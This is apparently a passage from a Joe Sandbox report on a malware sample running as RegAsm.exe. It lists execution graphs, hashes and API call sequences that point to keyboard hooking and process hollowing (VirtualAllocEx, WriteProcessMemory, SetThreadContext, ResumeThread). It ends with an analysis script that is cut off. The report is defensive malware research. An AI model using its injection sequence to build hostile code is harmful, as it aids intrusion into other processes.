                                          • Opcode ID: 1129d5acc91f34c88aac1b13e93a474e5b916630846190bd07db3081e01a7fbc
                                          • Instruction ID: 29ef3b4dae0f80d440e1258554852219d5ada10e6cd3646083b27d12cf2b2a20
                                          • Opcode Fuzzy Hash: 1129d5acc91f34c88aac1b13e93a474e5b916630846190bd07db3081e01a7fbc
                                          • Instruction Fuzzy Hash: B4F0486544E3C08FDB2387340D7A854BF706C1710835F95DFC4868F8A3E198988ADBA3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2036fbdeeda9a1591dfeb4b636c28e50b92f678e344f421123433820db3b7313
                                          • Instruction ID: 3f184b167a6462b3228ef37a55aa15d7074f2686e81045e54c09bffe76d12698
                                          • Opcode Fuzzy Hash: 2036fbdeeda9a1591dfeb4b636c28e50b92f678e344f421123433820db3b7313
                                          • Instruction Fuzzy Hash: 2F914CB0E002099FDF14CFADD9957EEBBF2AF88714F188129E405A7294EB759845CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage: 10%
                                          Dynamic/Decrypted Code Coverage: 100%
                                          Signature Coverage: 0%
                                          Total number of Nodes: 191
                                          Total number of Limit Nodes: 22
                                          execution_graph 23872 2d11c90 23873 2d11c94 23872->23873 23877 2dd7f8f 23873->23877 23881 2dd7fa0 23873->23881 23885 2dd80a8 23873->23885 23879 2dd7fa0 23877->23879 23878 2dd80a6 23878->23873 23879->23878 23889 2dd8130 23879->23889 23883 2dd7fcc 23881->23883 23882 2dd80a6 23882->23873 23883->23882 23884 2dd8130 GlobalMemoryStatusEx 23883->23884 23884->23883 23886 2dd807f 23885->23886 23887 2dd80a6 23886->23887 23888 2dd8130 GlobalMemoryStatusEx 23886->23888 23887->23873 23888->23886 23890 2dd813a 23889->23890 23894 2dd89b0 23890->23894 23898 2dd89a0 23890->23898 23891 2dd8246 23891->23891 23895 2dd89c5 23894->23895 23896 2dd8c64 23895->23896 23902 2dddf68 23895->23902 23896->23891 23900 2dd89b0 23898->23900 23899 2dd8c64 23899->23891 23900->23899 23901 2dddf68 GlobalMemoryStatusEx 23900->23901 23901->23899 23903 2dddf9d 23902->23903 23907 2dde201 23903->23907 23911 2dde210 23903->23911 23904 2dddfff 23904->23896 23908 2dde210 23907->23908 23914 2dde238 23908->23914 23909 2dde21e 23909->23904 23913 2dde238 GlobalMemoryStatusEx 23911->23913 23912 2dde21e 23912->23904 23913->23912 23915 2dde255 23914->23915 23917 2dde27d 23914->23917 23915->23909 23916 2dde29e 23916->23909 23917->23916 23918 2dde366 GlobalMemoryStatusEx 23917->23918 23919 2dde396 23918->23919 23919->23909 24048 2d17380 DuplicateHandle 24049 2d17416 24048->24049 24050 2d11d00 24051 2d11d0f 24050->24051 24054 2d12130 24050->24054 24058 2d12120 24050->24058 24055 2d1214f 24054->24055 24062 2d11d20 24055->24062 24057 2d12175 24057->24057 24059 2d1214f 24058->24059 24060 2d11d20 SetWindowsHookExW 24059->24060 24061 2d12175 24060->24061 24061->24061 24063 2d12280 SetWindowsHookExW 24062->24063 24065 2d1230a 24063->24065 24065->24057 24066 2dd23e8 24067 2dd240e 24066->24067 24071 2dd3158 24067->24071 24076 2dd3148 24067->24076 24072 2dd3185 24071->24072 24073 2dd31b7 24072->24073 24081 2dd36c8 24072->24081 24086 2dd36e8 24072->24086 24077 2dd3158 24076->24077 24078 2dd31b7 24077->24078 24079 2dd36c8 3 API calls 24077->24079 24080 2dd36e8 3 API calls 24077->24080 24079->24078 24080->24078 24083 2dd36e8 24081->24083 24082 2dd3788 24082->24073 24091 2dd378f 24083->24091 24095 2dd37a0 24083->24095 24088 2dd36fc 24086->24088 24087 2dd3788 24087->24073 24089 2dd378f 3 API calls 24088->24089 24090 2dd37a0 3 API calls 24088->24090 24089->24087 24090->24087 24092 2dd37a0 24091->24092 24093 2dd37b1 24092->24093 24098 2dd4955 24092->24098 24093->24082 24096 2dd37b1 24095->24096 24097 2dd4955 3 API calls 24095->24097 24096->24082 24097->24096 24103 2dd493d 24098->24103 24107 2dd4980 24098->24107 24111 2dd4990 24098->24111 24099 2dd497a 24099->24093 24104 2dd494d 24103->24104 24105 2dd49d9 24104->24105 24106 2dd4a2a CallWindowProcW 24104->24106 24105->24099 24106->24105 24108 2dd4990 24107->24108 24109 2dd4a2a CallWindowProcW 24108->24109 24110 2dd49d9 24108->24110 24109->24110 24110->24099 24112 2dd49d2 24111->24112 24114 2dd49d9 24111->24114 24113 2dd4a2a CallWindowProcW 24112->24113 24112->24114 24113->24114 24114->24099 23920 2d17998 23921 2d179c6 23920->23921 23924 2d16f4c 23921->23924 23923 2d179e6 23923->23923 23925 2d16f57 23924->23925 23926 2d1850c 23925->23926 23929 2d1a1a0 23925->23929 23935 2d1a153 23925->23935 23926->23923 23930 2d1a1c1 23929->23930 23931 2d1a1e5 23930->23931 23942 2d1a350 23930->23942 23946 2d1a3a8 23930->23946 23954 2d1a340 23930->23954 23931->23926 23936 2d1a133 23935->23936 23937 2d1a15b 23935->23937 23936->23926 23938 2d1a1e5 23937->23938 23939 2d1a350 6 API calls 23937->23939 23940 2d1a340 6 API calls 23937->23940 23941 2d1a3a8 6 API calls 23937->23941 23938->23926 23939->23938 23940->23938 23941->23938 23943 2d1a35d 23942->23943 23944 2d1a396 23943->23944 23959 2d1817c 23943->23959 23944->23931 23947 2d1a387 23946->23947 23948 2d1a3af 23946->23948 23950 2d1a396 23947->23950 23951 2d1817c 6 API calls 23947->23951 23948->23947 23949 2d1a3b3 23948->23949 23952 2d1a408 23949->23952 23953 2d181b0 6 API calls 23949->23953 23950->23931 23951->23950 23953->23952 23955 2d1a323 23954->23955 23956 2d1a34b 23954->23956 23955->23931 23957 2d1a396 23956->23957 23958 2d1817c 6 API calls 23956->23958 23957->23931 23958->23957 23960 2d18187 23959->23960 23962 2d1a408 23960->23962 23963 2d181b0 23960->23963 23962->23962 23964 2d181bb 23963->23964 23969 2d181c0 23964->23969 23966 2d1a477 23973 2d1fc08 23966->23973 23967 2d1a4b1 23967->23962 23972 2d181cb 23969->23972 23970 2d1b9f8 23970->23966 23971 2d1a1a0 6 API calls 23971->23970 23972->23970 23972->23971 23975 2d1fd39 23973->23975 23976 2d1fc39 23973->23976 23974 2d1fc45 23974->23967 23975->23967 23976->23974 23981 2d1fe80 23976->23981 23977 2d1fc85 23985 2dd1310 23977->23985 23989 2dd130b 23977->23989 23993 2dd0040 23981->23993 24003 2dd0007 23981->24003 23982 2d1fe8a 23982->23977 23986 2dd133b 23985->23986 23987 2dd13ea 23986->23987 24026 2dd21db 23986->24026 23990 2dd133b 23989->23990 23991 2dd13ea 23990->23991 23992 2dd21db 2 API calls 23990->23992 23992->23991 23994 2dd0051 23993->23994 23995 2dd0074 23993->23995 24001 2dd0007 3 API calls 23994->24001 24002 2dd0040 3 API calls 23994->24002 23995->23982 23996 2dd005c 23996->23995 24013 2dd02c8 23996->24013 23997 2dd0278 GetModuleHandleW 23999 2dd02a5 23997->23999 23999->23982 24001->23996 24002->23996 24004 2dd0051 24003->24004 24007 2dd0074 24003->24007 24011 2dd0007 3 API calls 24004->24011 24012 2dd0040 3 API calls 24004->24012 24005 2dd005c 24005->24007 24010 2dd02c8 2 API calls 24005->24010 24006 2dd006c 24006->24007 24008 2dd0278 GetModuleHandleW 24006->24008 24007->23982 24009 2dd02a5 24008->24009 24009->23982 24010->24006 24011->24005 24012->24005 24014 2dd02ec 24013->24014 24015 2dd006c 24014->24015 24018 2dd04b8 24014->24018 24022 2dd04b1 24014->24022 24015->23995 24015->23997 24019 2dd04fa 24018->24019 24020 2dd0500 LoadLibraryExW 24018->24020 24019->24020 24021 2dd0531 24020->24021 24021->24015 24023 2dd04b8 LoadLibraryExW 24022->24023 24025 2dd0531 24023->24025 24025->24015 24030 2dd2224 24026->24030 24034 2dd2230 24026->24034 24031 2dd2230 CreateWindowExW 24030->24031 24033 2dd2354 24031->24033 24035 2dd2298 CreateWindowExW 24034->24035 24037 2dd2354 24035->24037 24038 2d17138 24039 2d1717e GetCurrentProcess 24038->24039 24041 2d171d0 GetCurrentThread 24039->24041 24042 2d171c9 24039->24042 24043 2d17206 24041->24043 24044 2d1720d GetCurrentProcess 24041->24044 24042->24041 24043->24044 24047 2d17243 24044->24047 24045 2d1726b GetCurrentThreadId 24046 2d1729c 24045->24046 24047->24045

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 128 2d17128-2d171c7 GetCurrentProcess 132 2d171d0-2d17204 GetCurrentThread 128->132 133 2d171c9-2d171cf 128->133 134 2d17206-2d1720c 132->134 135 2d1720d-2d17241 GetCurrentProcess 132->135 133->132 134->135 136 2d17243-2d17249 135->136 137 2d1724a-2d17265 call 2d17309 135->137 136->137 141 2d1726b-2d1729a GetCurrentThreadId 137->141 142 2d172a3-2d17305 141->142 143 2d1729c-2d172a2 141->143 143->142
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 02D171B6
                                          • GetCurrentThread.KERNEL32 ref: 02D171F3
                                          • GetCurrentProcess.KERNEL32 ref: 02D17230
                                          • GetCurrentThreadId.KERNEL32 ref: 02D17289
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 10543d96841bdf3cdd6315d2066dd25ab9f21723e4de886508b037909c3fdfc2
                                          • Instruction ID: 08ee4a0fc241749338478678379a9eb7aae58c6450c7c1ab73aba01af2f3c1da
                                          • Opcode Fuzzy Hash: 10543d96841bdf3cdd6315d2066dd25ab9f21723e4de886508b037909c3fdfc2
                                          • Instruction Fuzzy Hash: 7E5164B0A003099FDB14CFA9E948BAEBBF1EF48314F24C45AE408A7760D7346D85CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 150 2d17138-2d171c7 GetCurrentProcess 154 2d171d0-2d17204 GetCurrentThread 150->154 155 2d171c9-2d171cf 150->155 156 2d17206-2d1720c 154->156 157 2d1720d-2d17241 GetCurrentProcess 154->157 155->154 156->157 158 2d17243-2d17249 157->158 159 2d1724a-2d17265 call 2d17309 157->159 158->159 163 2d1726b-2d1729a GetCurrentThreadId 159->163 164 2d172a3-2d17305 163->164 165 2d1729c-2d172a2 163->165 165->164
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 02D171B6
                                          • GetCurrentThread.KERNEL32 ref: 02D171F3
                                          • GetCurrentProcess.KERNEL32 ref: 02D17230
                                          • GetCurrentThreadId.KERNEL32 ref: 02D17289
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: c613d766cda5ccf6c55d1cbb7da7d9bcf91655339ebb53636af7d205b803902d
                                          • Instruction ID: eba35467977dac5a94473f6d463938d4286ba173eaebf46f677d4cc1c47bf630
                                          • Opcode Fuzzy Hash: c613d766cda5ccf6c55d1cbb7da7d9bcf91655339ebb53636af7d205b803902d
                                          • Instruction Fuzzy Hash: 0D5155B0A002099FDB14CFAAE948BAEBBF1EF48314F20C45AE419A7760D7746D44CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 358 2dd0040-2dd004f 359 2dd007b-2dd007f 358->359 360 2dd0051 358->360 361 2dd0081-2dd008b 359->361 362 2dd0093-2dd00d4 359->362 409 2dd0057 call 2dd0007 360->409 410 2dd0057 call 2dd0040 360->410 361->362 368 2dd00d6-2dd00de 362->368 369 2dd00e1-2dd00ef 362->369 363 2dd005c-2dd005e 365 2dd0074 363->365 366 2dd0060-2dd006e call 2dd02c8 363->366 365->359 366->365 375 2dd01b0-2dd0270 366->375 368->369 370 2dd00f1-2dd00f6 369->370 371 2dd0113-2dd0115 369->371 373 2dd00f8-2dd00ff 370->373 374 2dd0101 370->374 376 2dd0118-2dd011f 371->376 377 2dd0103-2dd0111 373->377 374->377 403 2dd0278-2dd02a3 GetModuleHandleW 375->403 404 2dd0272-2dd0275 375->404 378 2dd012c-2dd0133 376->378 379 2dd0121-2dd0129 376->379 377->376 382 2dd0135-2dd013d 378->382 383 2dd0140-2dd0149 378->383 379->378 382->383 386 2dd014b-2dd0153 383->386 387 2dd0156-2dd015b 383->387 386->387 388 2dd015d-2dd0164 387->388 389 2dd0179-2dd0186 387->389 388->389 391 2dd0166-2dd0176 388->391 395 2dd01a9-2dd01af 389->395 396 2dd0188-2dd01a6 389->396 391->389 396->395 405 2dd02ac-2dd02c0 403->405 406 2dd02a5-2dd02ab 403->406 404->403 406->405 409->363 410->363
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 02DD0296
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 337cff574741928fcfb18f047b4ec9eece8e05ab980d72f06819a1dc16ad4b71
                                          • Instruction ID: 98fde7251e91e45d01905fecc4a62e7f375d4549b793f5d2d1a1d36c26f729bd
                                          • Opcode Fuzzy Hash: 337cff574741928fcfb18f047b4ec9eece8e05ab980d72f06819a1dc16ad4b71
                                          • Instruction Fuzzy Hash: 047122B0A00B059FDB64DF6AD44475ABBF1FF88304F108A2AD48ADBB50DB75E845CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 411 2dde238-2dde253 412 2dde27d-2dde29c call 2dddb30 411->412 413 2dde255-2dde27c call 2dddb24 411->413 419 2dde29e-2dde2a1 412->419 420 2dde2a2-2dde301 412->420 427 2dde307-2dde394 GlobalMemoryStatusEx 420->427 428 2dde303-2dde306 420->428 432 2dde39d-2dde3c5 427->432 433 2dde396-2dde39c 427->433 433->432
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87f23f8b341543d536259011b408526d1d199d029e4aeec60d0fc112942a43d9
                                          • Instruction ID: eb0a212c9658acde081f16d1adb0808be7d0565fe2e9da226cdbb12da457fb9d
                                          • Opcode Fuzzy Hash: 87f23f8b341543d536259011b408526d1d199d029e4aeec60d0fc112942a43d9
                                          • Instruction Fuzzy Hash: 93411372D007559FCB14DFB9D80469EBFF5AF8A220F1485AAE408A7341DB74A844CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 436 2dd2224-2dd2296 438 2dd2298-2dd229e 436->438 439 2dd22a1-2dd22a8 436->439 438->439 440 2dd22aa-2dd22b0 439->440 441 2dd22b3-2dd2352 CreateWindowExW 439->441 440->441 443 2dd235b-2dd2393 441->443 444 2dd2354-2dd235a 441->444 448 2dd2395-2dd2398 443->448 449 2dd23a0 443->449 444->443 448->449 450 2dd23a1 449->450 450->450
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DD2342
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: b3403a128b94992da7dd9b4b63e64e5320e7ba3d958740e54d2b5bd4d91ff7ee
                                          • Instruction ID: 49ea7e2df8c0b9840ee2a75db3f9bac3fe30cd05af636db818bdd526e577b3e7
                                          • Opcode Fuzzy Hash: b3403a128b94992da7dd9b4b63e64e5320e7ba3d958740e54d2b5bd4d91ff7ee
                                          • Instruction Fuzzy Hash: 0C51EFB1D003499FDB14CF99C984ADEBFB5BF88310F24812AE818AB210D774A885CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 451 2dd2230-2dd2296 452 2dd2298-2dd229e 451->452 453 2dd22a1-2dd22a8 451->453 452->453 454 2dd22aa-2dd22b0 453->454 455 2dd22b3-2dd2352 CreateWindowExW 453->455 454->455 457 2dd235b-2dd2393 455->457 458 2dd2354-2dd235a 455->458 462 2dd2395-2dd2398 457->462 463 2dd23a0 457->463 458->457 462->463 464 2dd23a1 463->464 464->464
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DD2342
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 45f78fe9dd527e670bc35025a178896c045dc14d44b0336c14887a6940ae2312
                                          • Instruction ID: fe6a7c6b66a8399202c19a35d34e9830ed3bffbb9cbfbf3dbfef0da398147998
                                          • Opcode Fuzzy Hash: 45f78fe9dd527e670bc35025a178896c045dc14d44b0336c14887a6940ae2312
                                          • Instruction Fuzzy Hash: 3041CEB1D10309DFDB14CF9AC984ADEBBB5BF88310F24812AE819AB310D774A845CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 465 2dd4990-2dd49cc 466 2dd4a7c-2dd4a9c 465->466 467 2dd49d2-2dd49d7 465->467 474 2dd4a9f-2dd4aac 466->474 468 2dd49d9-2dd4a10 467->468 469 2dd4a2a-2dd4a62 CallWindowProcW 467->469 475 2dd4a19-2dd4a28 468->475 476 2dd4a12-2dd4a18 468->476 470 2dd4a6b-2dd4a7a 469->470 471 2dd4a64-2dd4a6a 469->471 470->474 471->470 475->474 476->475
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02DD4A51
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: f0e78112279ff8197c5fd4a2129f4e447993b2cd617a4c7abedd3deb741adbf6
                                          • Instruction ID: 858ebfe84a504c0dc973ddf13430ee67c55d845d69ed69b5232652981eba7c5b
                                          • Opcode Fuzzy Hash: f0e78112279ff8197c5fd4a2129f4e447993b2cd617a4c7abedd3deb741adbf6
                                          • Instruction Fuzzy Hash: 8D4129B4A04705DFCB14CF99C588AAABBF5FF88318F24C499E519A7321D774A941CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 479 2d17378-2d1737d 480 2d17355-2d1736c 479->480 481 2d1737f-2d17414 DuplicateHandle 479->481 482 2d17416-2d1741c 481->482 483 2d1741d-2d1743a 481->483 482->483
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D17407
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 0998db45d4425e6ae9785c6a9fb233bda1314e1837340e8e55bcff866de8bc84
                                          • Instruction ID: cb0109b2ba667d2d54e09feddce387c7e91ab448893ea3875652cd3eaac39a14
                                          • Opcode Fuzzy Hash: 0998db45d4425e6ae9785c6a9fb233bda1314e1837340e8e55bcff866de8bc84
                                          • Instruction Fuzzy Hash: C33116B5E002499FDB10CFAAE584ADEBBF5EB88320F24841AE954A3350D374A955CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 487 2d17380-2d17414 DuplicateHandle 488 2d17416-2d1741c 487->488 489 2d1741d-2d1743a 487->489 488->489
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D17407
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 775e60bf292f016bd784cb26a084602847a4a6b8c3b011cc0fb3a2c401688f7f
                                          • Instruction ID: c1dcf18dcb80be8d6df04381fd92474c667f1d2428580785f9c5f38810312339
                                          • Opcode Fuzzy Hash: 775e60bf292f016bd784cb26a084602847a4a6b8c3b011cc0fb3a2c401688f7f
                                          • Instruction Fuzzy Hash: AA21C4B5D00249AFDB10CF9AD985ADEFFF4EB48324F24841AE914A7350D378A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowsHookExW.USER32(010E44CC,00000000,?,?), ref: 02D122FB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HookWindows
                                          • String ID:
                                          • API String ID: 2559412058-0
                                          • Opcode ID: 24cb51d7d7804643db769dbd838a8e68dd6f0b656185f5712d472023166ef2a1
                                          • Instruction ID: 5eb7e70933ffab2c4ed4359fa256efa52b73ac5e1a8fb602d6a99d78f7230b18
                                          • Opcode Fuzzy Hash: 24cb51d7d7804643db769dbd838a8e68dd6f0b656185f5712d472023166ef2a1
                                          • Instruction Fuzzy Hash: 352125B1D002199FCB14CF9AD948BEEBBF5AB88310F14841AE859A7750C775A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowsHookExW.USER32(010E44CC,00000000,?,?), ref: 02D122FB
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136481061.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2d10000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HookWindows
                                          • String ID:
                                          • API String ID: 2559412058-0
                                          • Opcode ID: f94cdb1af48a159bd3e62b8571bd01c391b7a3ef73861cf03770996c239159d8
                                          • Instruction ID: 56375821befdc6bcf482c79ef3e179691cd33062c5c016c531dcd07e811a6f22
                                          • Opcode Fuzzy Hash: f94cdb1af48a159bd3e62b8571bd01c391b7a3ef73861cf03770996c239159d8
                                          • Instruction Fuzzy Hash: B82157B1D002499FCB14CF99D944BEEFBF4AF88310F24842AE818A7350C774A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02DD0522
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: bbe94f1bfbaf6e24d30470ecd25404a0067aa5895341e8775a00a0691a9ea44d
                                          • Instruction ID: fa2f92c56785ab845a711dc970d8d67ebe205c53dda17249b8f73ddc952eeef3
                                          • Opcode Fuzzy Hash: bbe94f1bfbaf6e24d30470ecd25404a0067aa5895341e8775a00a0691a9ea44d
                                          • Instruction Fuzzy Hash: FE1114B6D003498FCB10CF9AD444A9EFBF4EF88324F14846AE919A7300C374A945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 02DDE387
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: 39cb1dbb47ba87e1062445b3a7a7e4ffa33fb39619641421d628d9f4fd1d9d5c
                                          • Instruction ID: bff18a231e77e851b8ecfcaf92b56869373c6b9193bc9328669b9baebd6bb89f
                                          • Opcode Fuzzy Hash: 39cb1dbb47ba87e1062445b3a7a7e4ffa33fb39619641421d628d9f4fd1d9d5c
                                          • Instruction Fuzzy Hash: 991126B1C0065A9BCB10CF9AC545BDEFBF4AF48324F14816AD418B7340D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 02DD0522
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.4136789902.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2dd0000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 728c95ac86c839ce8adfa99c1e918b5f376e4808073182efe0ac2bbcf6ffca1e
                                          • Instruction ID: 365e9ab3bba49768e8daee00da7484648578a53fd90d1c06a0651f86e6729c81
                                          • Opcode Fuzzy Hash: 728c95ac86c839ce8adfa99c1e918b5f376e4808073182efe0ac2bbcf6ffca1e
                                          • Instruction Fuzzy Hash: AA1126B6D003498FCB10CF9AD444ADEFBF4EB88324F14841AD819A7300C374A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:15.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:42
                                          Total number of Limit Nodes:2
Execution graph (rendered as a call-graph image in the report; nodes are block addresses, labels are the Win32 API called from that block):
1510848 -> 151084e -> 1510852
151084e -> 1512211 -> 15163c0 -> 15163cc -> 15163d6 -> 1512222 -> 1510852
15163cc -> 151796a -> 151797a -> 1518030 -> 15180c0 CreateProcessAsUserA -> 151827f
151797a -> 1518025 -> 1518030 CreateProcessAsUserA -> 151827f
1512211 -> 15163b3 -> 15163cc -> 15163d6 -> 1512222; 15163cc -> 151796a (11 API calls) -> 15163cc
1517a1c -> 15184c8 ReadProcessMemory -> 1517b01 -> 15185b8 VirtualAllocEx -> 1517b7d; 1517a1c -> 1517d27
1517b7d -> 1518660 / 1518658 WriteProcessMemory -> 1517bf0; 1517b7d -> 1517d27
1517bf0 -> 1518660 / 1518658 WriteProcessMemory -> 1517bf0; 1517bf0 -> 1517ce9 -> 1518660 / 1518658 WriteProcessMemory -> 1517d27
1517d27 -> 1518408 Wow64GetThreadContext -> 1517d63; 1517d27 -> 1517d63
1517d63 -> 15187c0 / 15187c8 Wow64SetThreadContext -> 1517d80; 1517d63 -> 1517d80
1517d80 -> 1518890 / 1518888 ResumeThread -> 1517daf -> 15163cc
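Joe Sandbox exports an execution graph like the one above as a single run of node and edge tokens in the raw report. The script below, added here as an example and not part of the Joe Sandbox report or its tooling, parses that token stream back into nodes (block address plus any API label) and edges, lists the blocks that call each API, and checks the resulting API set against a process-hollowing profile. The graph text is copied from the report's execution graph for process 9 (bddddsx); the token-format assumptions (decimal node ids, 6 to 8 hex-digit block addresses, "N API calls" marking a summarised callee) and the hollowing profile itself are this example's own.

```python
"""Parse a Joe Sandbox execution_graph token stream and test the API set
against a process-hollowing profile.

Added example for this report, not Joe Sandbox code.  EXEC_GRAPH is copied
from the report (process 9, injector function at 151796a); the token-format
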